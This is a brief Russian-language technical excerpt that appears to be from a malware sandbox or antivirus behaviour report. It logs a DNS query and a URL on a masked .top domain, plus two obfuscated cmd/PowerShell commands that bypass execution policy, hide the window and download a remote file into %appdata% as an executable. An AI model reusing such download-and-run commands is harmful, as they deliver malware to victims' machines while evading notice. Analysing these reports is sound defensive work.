Техническая информация
- http://ne###argoka.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwE^RsHEll.E^X^e^ -eXEcuTIonpOLiCY b^Y^Pa^sS^ -^noP^ROf^iL^E ^-wI^Nd^O^W^StY^le^ hiDd^e^N^ (^nEw-Obj^e^c^t SysT^eM.n^ET^.^WEBCl^iENt^).^dO^w^n^lOadFIL^e^('http://ne###argoka.t...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "pOwE^RsHEll.E^X^e^ -eXEcuTIonpOLiCY b^Y^Pa^sS^ -^noP^ROf^iL^E ^-wI^Nd^O^W^StY^le^ hiDd^e^N^ (^nEw-Obj^e^c^t SysT^eM.n^ET^.^WEBCl^iENt^).^dO^w^n^lOadFIL^e^('http://ne###argoka.t...' (со скрытым окном)